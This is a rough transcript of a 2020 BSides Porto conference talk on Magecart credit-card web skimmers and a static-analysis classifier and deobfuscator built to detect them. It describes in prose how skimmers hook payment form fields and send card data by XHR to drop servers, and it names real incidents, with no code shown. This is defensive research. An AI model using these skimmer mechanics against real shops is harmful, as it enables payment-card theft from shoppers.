← All talks

"Web Skimmers: Seek & Destroy" by Pedro Fortuna

BSides Porto34:4771 viewsPublished 2020-11Watch on YouTube ↗
About this talk
Talk presented at the 2020 edition of Security BSidesPorto.
Show transcript [en]

hopefully you are seeing my screen right now my my first slide of my presentation yes okay so um i'm very happy to be here um for for uh for the ones who are local you you might already know me uh for the ones who are not local i'm i've been working with security for more than 15 years uh the last 10 i decided to focus on application security and specifically on code protection javascript security and client security in general this will be actually my sixth b sites conference but it's a very special one because it's in porto my hometown and it's the very first besides porto so thank you to the organization hopefully it will be

the first of many um also um anything related with with browser security reverse engineering hacking the web in general i'm very much interested in as consul already said i'm co-founder and cto at jscrambler and for today i have somewhat ambitious agenda so i'll try to to move uh quickly first i will i will frame what is magegard what are the mage card attacks then we'll go through web scheming uh web schemer anatomy um then we'll get into the main uh part of the presentation uh in which we'll i'll present the work that we have been doing to to catch uh web schemers if we have time i'll present brutus uh that i'll talk about in a minute or

so and finally the q a so about mage card attacks some of you may have heard about magekart it actually the name comes from magento the the e-commerce software right now it's no longer only related with magento it's actually affecting any e-commerce websites and even other types of websites but mainly e-commerce anything that has payments or credit card payments information being inserted might be targeted by a mage card attack um each card attack is is part of a supply chain uh type of attacks it usually targets third-party code that is let me just interrupt you on my screen at least i just see the the first uh all right okay slide so probably is not

or he's not moving or is he swapping the screen exactly so let me fix that okay so

sorry to cut your line of thought but no no no no i'm glad you did so let's see if this works if this does not work i will i will disconnect i think multiple monitors no it's the same all right so no worries i'll fix it

just give it a second and now i only have one monitor so it must work how about now it's okay okay okay all right so um so like i was saying uh usually targets third-party code that is used together in the web application but in some cases it can also affect first party code um the mage card attacks are done initially by a single group but eventually as it became very profitable uh many groups start doing the same and now there's a whole uh cyber criminal area of people just going after the credit card information it's no wonder it's popular because it scales well if you manage to change a javascript file you can you basically are able to

inject arbitrary code in the page and do whatever you want and it will affect all the users at once in that website um it's also popular because you don't have to affect the main website the the e-commerce chop you can go after the the weakest link the the third-party vendor that is being used in the page and and and leverage the fact that they might have less resources dedicated to security and it will be generally easier to compromise those third parties than going after the the main website so it basically works like this you have third party code being inserted dynamically into the page that code can dynamically add more code so there's a shading effect you can also

have iframes and those iframes can can bring more javascript into the mix if any of these are compromised usually it means that the whole website is running injected arbitrary javascripts uh once he he collects the data that he wants uh it usually sends the data out uh usually through xhr to a drop server running in in in some domain in this case coolestfonts.com and and and the attacker is able to to collect a large number of credit card data with using this scheme so you might ask how big is this problem how often this happens uh actually right now uh almost every week certainly every month and these are just a few that uh i was able

to collect it's it's uh somewhat hard to keep up and and and and know about all of these attacks it's becoming one of the most common type of attack out there right now so let's get into the anatomy of a web schemer the web schemer is the payload that gets delivered in a mage current attack this one that you're seeing is the payload for the ticketmaster attack so the attackers were able to compromise a third-party vendor called inventor and this is one line of codes that has some obfuscation it's actually not that sophisticated so you can have a look at the unobfuscated version of that um it basically has this type of actions first it checks if

it's in the correct page where the payments information is being inserted then it usually iterates all the form fields in the page and install event handlers to to to listen when clicks are on clicks in these fields um when that happens it collects all the data uh in those fields it also installs event handler for on submit events of the form and eventually it sends data out to the drop server using xhr post and it runs every 30 milliseconds in the page so it's continuously trying to harvest information from the the credit card form um web schemers are usually so you can do a web schema by yourself attackers can do it but they usually buy of schemer kits

and they do it because then they don't need any special skills they just need access to compromised uh e-commerce server magento or anything anything else they have access and then they just inject the web schemer in place if you have a web skimmer kit you'll have access to a c2 admin panel you will see the number of accesses and credit cards that were harvested a credit a web schemer kit goes from 250 dollars to 5 000 on the dark web uh usually it's used in spray and prey kind of attacks so they will try to infect as many as many servers they can and try to to to be present in all in as many payment forms pages as they

can uh but this is not necessarily true for all attacks some attacks are very targeted um there are also um toolkits like inter uh this is one uh an example uh usually it goes uh so it costs you thirteen hundreds uh in this case it uses a javascript obfuscator called caesar plus which costs around 100 on the dark web and one of the things that it does is fake checkout pages so basically it takes the user through a fake checkout page which is usually the type of attack that you see in the spray and pray kind of attack because transactions are not successful the ones that are more successful are the ones that are able to skin the

credit card without interrupting the actual purchase because then it will be harder for people to to notice so uh before i get into the solution that we are developing let me very briefly talk about the type of protection that we are uh putting in place for this type of attacks we have um so the talk is not about this at all this is just a little bit of context uh we have a solution where we we have an embedded agent which is inserted into web pages and it uses javascript virtualization which works like this so the embedded agent is inserted then it proceeds to to virtualizing uh proxying a lot of dom methods and web api methods and

once we do that the all the third party code is basically running the proxy through the proxy versions of these methods which means that we we are doing a sort of man in the middle uh in the execution of this element methods and we are able to enforce rules um and and to to run policies so what we do is we we have a rule-based behavior control solution it's meant to prevent mageguard or form checking which is another another term for um credit card scheming uh it checks for evan handler hijacking it does dom anti-tampering um it provides data leakage protection um and the the embedded agent itself it's protected with with uh with very advanced um anti-tampering

uh technology from js grammar so what we are talking next is something that is combined with with this solution but it's a separate piece um the motivation to so what what what i'm talking about is the mage card classifier the motivation for this is of course we can mitigate major cards but uh by applying the rules and enforcing the rules but sometimes it's hard to know that we are facing a schemer that we are dealing with magegar because there's lots of different codes out there and they all might mess up with form fields and add their own event handlers and and do a lot of different things so how can we be sure that we are

dealing with the schemer and and and what kind of schemer what and precisely what's camera are we talking about so for that we started working on the mage card classifier uh right now it's the static code analysis based mage card classifier uh and the goal is to answer this question how likely is that this this file contains a mage card schemer and the answer is um a percentage zero to one um so first of all a disclaimer this is a work in progress uh i'm presenting some results but there's a lot of things to to be done on top of what i'm presenting so the requirements for the solution we wanted the solution to be

purely based on behavior not regex expressions or any hard-coded signatures there are some some solutions in the market that use them but it's far too easy for attackers to to change uh those signatures and to to to break out from those rejecters because it's it's easy to transform javascripts just enough so that those signatures are not triggering so we are watching for behavior what they are actually doing what functions they are calling uh rather than uh looking at the form as the as the main technique uh it needs to deal with obfuscation of course because most of these schemers are obfuscated so we need to detect obfuscation we need to in some cases automatically de-obfuscate the code in

order to have a look at what's underneath and to extract a diverse set of behaviors and obviously we want it to be as accurate as possible the architecture in in general is like this so we have an obfuscation detection module uh it detects if obfuscation is being used but also what obfuscator was used then we have the obfuscator module that's uh it's pretty self-explanatory what it does and once we have the underlying code we have a feature features extractor so we are extracting the behaviors the things we are looking for uh using this module and finally we have a score module which using heuristics and in feature groups it scores the the file and if the the the percentage is

over 50 we consider that to be a schemer so disclaimer no ai is used so i'm just anticipating this question but uh we do have plans to use it in the future for now is a simpler but effective first version of this magegard classifier these are the groups of the features that we are extracting just examples we look for many different dimensions obfuscation access to storage the use of stenography encoding techniques uh network access etc etc so the goal was to be as diverse as possible in order to better characterize the behavior of the the web schemers so now let me uh so i'll i'll demonstrate the use of the the mage card classifier through the use

of three schemers samples and first we'll start off with with british airways schemer so the this schemer is very simple uh is ex so you're seeing the the 100 the schemer on the right side window it wasn't even obfuscated it's just a simple function that hooks into the payment form and serializes all the form fields and sends everything to this ba waze.com server um i don't know if you know this but this magecart attack was the corresponded to the biggest gdpr fine in history it was roughly 204 million euros of a fine british airways say that it ran for 15 days but even that was controversial uh some some people think that it lasted probably the last like two months

and they were able to scheme almost 400 000 credit cards um so the impact was huge uh in terms of the schemer um it uses no obfuscation and it does very simple things so let me so i'm running the the the mage card classifier we have a demo in order to save time i i pre-recorded the demo so let me play this i hope you can see so it was inserted into a modernizr library at the very bottom of the scripts actually it was a first-party breach so some someone from british airways team uh fetched this file and and it was already compromised so it was a very severe incident and and next i'll i'll run the classifier so

the classifier is a cli a tool it uses as inputs the the file that we want to classify and it also presents the features that we were able to to find okay so running running this it yields the the final score i'm not sure if you are able to see it but it's uh 52 all right so just barely over the mage card threshold that we are considering uh because it's it doesn't use obfuscation uh it's very simple so uh regarding our heuristics it barely is over the threshold that we consider nevertheless we would would have picked up this this file and and probably um try to to have a deeper look at it skimmer number two is the one that we

saw before the ticketmaster inventor schemer so this particular schemer uses obfuscation um it also uses new techniques like page location check it checks if it's in the right place it has multi-page checkouts so it uses cookies to to store information as the user progresses in in the payment process and also the the other things are are the normal things that we have event binding xhr post and target selectors so we have a new demo um so for for this particular schemer uh we are testing uh three versions of the schemer one the first one is a de-obfuscated version of the schemer uh so after the obfuscation the obvious case manual the obfuscation of of the schemer

and as you can see the the final score was 66 and no affiliation was detected in the features list because it's has been previously de-obfuscated but we also run um for the obfuscated version which is the one that you'll see next

okay so right now is detecting obfuscation and uh logically the final score is 81 so it's higher because it also detected obfuscation and that alone is also a sign of of a schemer not not just because it was uh we found obfuscation but this particular type of obfuscation because some of the skaters are are regularly used by by schemers and obviously we look for those as well so the results the the first one the obfuscated version is 66 the obfuscated version but only containing the schemer 81 percent and we detected the obfuscation uh it was used the xanax obfuscator um and finally if we analyze the full file uh we'll the grade was 85 percent

because by by so by finding just as a smaller part of the file is obfuscated and looks like a schemer it's more suspicious and hence the the higher score finally uh we're looking at caesar schemer it uses a different kind of obfuscation that you can see at the right it's called it's using caesar plus obfuscation it also has multi-page checkouts but it uses local storage not cookies for that um so in order to work this example we actually developed um a caesar plus the off skater that hopefully if i have time i will show you at the end and the score was 86 so it's higher than the previous examples that i've shown you uh

mostly because the caesar obfuscation is much more tied to malicious activity to malware and to web schemers then sonic's sun x is somewhat tight but there are some legitimate uses of sonics sometimes so if we look at the scores uh all the the the samples that i've shown you uh the the grades uh the the score the final score was increasing in increasing order so the the one that is most likely a schemer is the the last one but all of them were above the 50 threshold that we consider so about testing we collected um 244 unique schemers samples so these are real mage card schemers and also we collected javascript code from the top 1000 alexa

which resulted in 11 353 files we pre-labeled the schema samples ran the classifier through all the javascript files and finally compare the score with the label and see if our estimation was accurate or not we measure measured false positives through positives false negatives and true negatives and these are the results so right now using this data set we managed to be 95 accurate so it was actually pretty good for this data set but we and i think that the the reason why is is mostly connected with the fact that we are collecting a lot of diverse behaviors and not using signatures at all so the final part of this presentation and i think i'll have time for that

is present you the brutus minus which is the obfuscator for caesar plus that we have developed so the caesar plus is um available on the dark web for roughly 100 it's being used for all sorts of malware and we analyzed so initially we analyzed this um this obfuscation it basically has two layers of obfuscation uh it uses a number of different string and integer obfuscations you can see some examples so you have a ternary operator which is not really hard to to digest so it's very easy converts strings to base 34 uses regex to clean somewhat of skated string so it's not very not that hard to remove this type of constructs and it also injects that code but the

hardest hardest part is dealing with with the first layer so the first layer that you can see here is actually encoded in javascript uh so i called it this ciphering but it's actually not using encryption it's using encoding so it self decodes using evolve and then evaluates the resulting the results and after that it gets the underlying code the underlying code the layer 2 uh also does a sort of anti-tempering so it uses crc checks to see whether or not we have removed the first layer so um using reflection um and so you have to use some techniques to remove this layer one without triggering the crc in the layer two and underneath you can

see a lot of more number and string obfuscations a lot of more that code etc so final demonstration uh running the bluetooth minus in this code so this is a sample obfuscated with caesar plus and here i'll run the brutus brutus minus on this sample okay so i redirected the outputs to this file brutus.js and this is the output so you can see the page location tests you can see you can still see some of that code running around but it's not really preventing us from understanding what's happening you see the query selector the ad event listeners so it pretty much solves the problem for us so in terms of classification because we are able to do

static analysis on the result without any issue whatsoever and you also see a lot of access to local storage you see the the drop server address so there's a lot of things that you can see here but generally it's not um we have everything pretty wide open to do our classification all right so wrapping up [Music] web schemas are increasingly more sophisticated there's a lot i couldn't fit into this presentation some schemers are using bot detection some schemers are using stenography some schemers are using sending data out as as images there's uh it's kind of a cat and mouse game and and the only way to approach this problem is by using behavior-based defenses which is

our approach uh but it's not enough to to block and and control the behavior and enforce the behavior that one wants it's also important to know what we are dealing with and ends the work on this schema or mage card classifier and we obviously we decided to build one so we presented it can work through layers of obfuscated codes the results right now are very promising um you can either use the results straight out of this classifier or use it as a way to to select candidates for deeper analysis for even manual analysis if you want it uses static code analysis which scales very well we are not running engines we are not running browsers

so we we don't have to deal with all of that confusion we just need to run it against a large set of javascript files and look at the results as a bonus uh we presented brutus minus our caesar plus the obfuscator and that's it for now uh we'll continue to work in this match card classifier and perhaps we'll see each other again in uh in a follow up presentation where we'll have more more things to show thank you thank you pedro thank you for your talk always good to know a little bit more on javascript attacks and how they they appear and as we are exposed daily to to those problems everyone buys things on the internet so those those

attacks are on our list too um there are some questions someone not understanding 100 how they inject malicious javascript so if you can explain a little bit more and another question uh coming from jean-paulo that asks um if you are you considering to use different weights for for to analyze the different features that your products has or if you already are doing that all right the the injection of the javascript is usually done by compromising a server and usually let's say it's a magento server uh usually what they do is very unsophisticated attacks like brute forcing the admin password or leveraging the fact that they are not running the latest version of the of the of the software and it has

known vulnerabilities so it actually the mage cards so the breach happens before the mage cards uh and any anyway goes so they in spray and pray attacks they they are not after usually a specific server they just try to reach as many servers as they they can and and they they inject the schemer all at once in all targets and wait for the results second question different different weights we are already using different weights for for the different features right now we are not adjusting these features or these weights automatically this is one of the things that we'll work on using machine learning [Music] but for now it's it's working pretty good at least using the data set that we have

been testing another small question thank you for the answers another small question is that if the the remote scan that you did detect top 1000 sites is that good available like in github or so um i don't think so it's not available but it's not um it's something that we can easily share because it's not it's not very complicated code i'm sure you will be able to find this type of codes on github because there's lots of different tests that that are done against alexa top 1000 or 10 000 etc but um but after the talk talk with me and we'll we'll we'll give you access to it okay thank you thank you for your

presentation again and for your time